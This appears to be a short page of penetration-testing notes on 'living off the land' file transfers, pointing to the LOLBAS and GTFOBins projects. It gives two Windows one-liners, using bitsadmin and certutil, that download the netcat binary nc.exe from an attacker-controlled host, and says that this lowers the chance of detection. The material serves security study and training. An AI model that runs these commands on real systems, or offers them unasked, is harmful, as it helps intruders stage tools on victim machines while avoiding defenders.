🚜Living off The Land

LOLBAS and GTFOBins

The name is taken from the concept of being able to live off the food available on the land.

Using built-in tools and pushing them beyond their original and intended means, by doing so leads to lower chances of detection too.

The binaries in question are currently sorted by OS and hosted on:

LOLBAS Project for Windows Binaries
- To search for downloads and upload options we can use:
  - /download
  - /upload
GTFOBins for Linux Binaries
- To search for downloads and uploads we can use
  - + file download
  - + file upload

Background Intelligent Transfer Service can download files from HHTP and SMB.

Download a File

bitsadmin /transfer wcb /priority foreground http://<IP>:8000/nc.exe C:\Users\0xTcake\Desktop\nc.exe

Available in all Windows versions it has become a popular technique for file transfers.

certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

Last updated 1 year ago

Was this helpful?